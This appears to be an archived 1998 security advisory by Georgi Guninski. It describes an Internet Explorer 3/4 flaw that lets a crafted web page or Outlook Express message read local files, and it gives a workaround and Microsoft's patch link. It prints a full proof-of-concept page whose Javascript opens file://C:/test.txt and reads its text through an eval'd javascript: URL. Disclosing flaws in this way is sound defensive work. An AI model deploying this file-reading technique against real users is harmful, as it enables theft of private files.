There is a bug in Internet Explorer 3, 4.0, 4.01 (for version information see Microsoft's info below), which allows a specially designed web page to read text or HTML files from the user's computer and send their contents to an arbitrary host, even if the user is behind firewall. The bug uses Javascript and the file name and location must be known. Another way to exploit this bug is to send a specially designed message to an Outlook Express/IE4 user. Demonstration of this is available at: http://www.geocities.com/ResearchTriangle/1711/good-read.html Workaround: Disable Javascript. Microsoft has released a patch at: http://www.microsoft.com/security/bulletins/ms98-013.htm Georgi Guninski http://www.geocities.com/ResearchTriangle/1711 The source of the page: ----Cut here--- <HTML> <HEAD><TITLE>Read text/HTML file with Internet Explorer 4.01></TITLE></HEAD> <BODY> This demonstrates a bug in IE 4.01 under Windows 95 (don't know for other versions), which allows reading text or HTML file on the user's machine. <B>Create the file c:\test.txt</B> and its contents are shown in a message box. The file may be sent to an arbitrary server even if behind a firewall. <BR> To test it, you need Javascript enabled. <BR> This file is created by <A HREF=http://www.geocities.com/ResearchTriangle/1711>Georgi Guninski.</A> <SCRIPT LANGUAGE="JAVASCRIPT"> alert("This page demonstrates reading the file C:\\test.txt (you may need to create a short file to view it)"); var x=window.open('file://C:/test.txt'); x.navigate("javascript:eval(\"var a=window.open('file://C:/test.txt');r=a.document.body.innerText;alert(r);\")"); </SCRIPT> </BODY> </HTML> ____________________________________________________________________ Get free e-mail and a permanent address at http://www.netaddress.com/?N=1
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:14:59 PDT